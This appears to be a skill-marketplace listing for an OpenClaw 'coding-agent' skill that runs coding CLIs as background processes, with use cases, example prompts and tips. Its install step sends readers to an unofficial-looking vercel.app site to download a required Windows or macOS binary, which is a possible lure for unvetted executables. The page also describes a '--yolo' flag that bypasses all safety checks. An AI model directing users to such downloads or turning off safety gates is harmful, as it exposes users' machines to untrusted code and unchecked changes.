coding-agent
Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.
Why use this skill?
Integrate Codex, Claude Code, and OpenCode into OpenClaw. Streamline your development with autonomous coding agents, PR reviews, and background task management.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/thiagoruss0/coding-agent696vgWhat This Skill Does
The coding-agent skill is a powerful automation wrapper that allows the OpenClaw agent to interface with enterprise-grade coding CLI tools like Codex, Claude Code, and OpenCode. By operating in background mode, it enables asynchronous development workflows, allowing you to trigger complex codebase generation, autonomous code reviews, and programmatic refactoring without blocking the main agent session. It specifically manages the lifecycle of these tools, handling process tracking, directory scoping, and safety-gated execution modes.
Installation
Before activating the skill within OpenClaw, you must ensure the underlying CLI binary is available on your host system.
- Visit https://openclawcli.vercel.app/ and follow the installation instructions for your specific OS (Windows or macOS).
- Verify the installation by running the CLI in your terminal.
- Install the skill into your OpenClaw environment using the command:
clawhub install openclaw/skills/skills/thiagoruss0/coding-agent696vg.
Use Cases
- Autonomous Feature Development: Use
--full-autoto generate feature boilerplate or logic implementations in a sandboxed directory. - PR Auditing at Scale: Conduct batch code reviews across multiple branches or repositories by spawning parallel background processes.
- Experimental Refactoring: Use the
--yoloflag for rapid prototyping in non-production, disposable scratch spaces to test architectural changes quickly. - Background CI/CD Testing: Offload static analysis or code linting tasks to the background while you continue interactive work in the foreground.
Example Prompts
- "Run a background coding task in the ./src folder to refactor all API endpoints to use the new middleware pattern, then notify me when finished."
- "Start a full-auto session to build a basic React todo application in a new temporary directory and give me the path when complete."
- "Trigger a review of the current PR in my local repository using the codex CLI and log the findings to my process history."
Tips & Limitations
- Always use
workdir: Scoping your workspace is critical. Without it, the agent may attempt to analyze the host environment, leading to performance degradation or accidental modification of sensitive files. - Handle Sensitive Repos: Never run reviews on the internal Clawdbot directory directly; always use
git worktreeor temp cloning to prevent breaking your active OpenClaw instance. - Process Management: Since these run in the background, remember to use
process action:pollperiodically to check the health and status of your tasks. - Safety: The
--yoloflag bypasses all safety checks. Only use this in isolated, non-production environments where code loss is acceptable.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-thiagoruss0-coding-agent696vg": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: file-write, file-read, code-execution
Related Skills
n8n
Manage n8n workflows and automations via API. Use when working with n8n workflows, executions, or automation tasks - listing workflows, activating/deactivating, checking execution status, manually triggering workflows, or debugging automation issues.
Read WeChat local data from SQLite databases. Supports listing contacts, chat sessions, searching messages, and viewing favorites. Use when the user needs to access their own WeChat data stored locally. Requires access to WeChat data directory. Read-only operations only.
veo3-gen
Generate and stitch short videos via Google Veo 3.x using the Gemini API (google-genai). Use when you need to create video clips from prompts (ads, UGC-style clips, product demos) and want a reproducible CLI workflow (generate, poll, download MP4, optionally stitch multiple segments).
seo-optimizer
This skill should be used when analyzing HTML/CSS websites for SEO optimization, fixing SEO issues, generating SEO reports, or implementing SEO best practices. Use when the user requests SEO audits, optimization, meta tag improvements, schema markup implementation, sitemap generation, or general search engine optimization tasks.
jira
Jira API integration with managed OAuth. Search issues with JQL, create and update issues, manage projects and transitions. Use this skill when users want to interact with Jira issues, projects, or workflows. For other third party apps, use the api-gateway skill (https://clawhub.ai/byungkyu/api-gateway).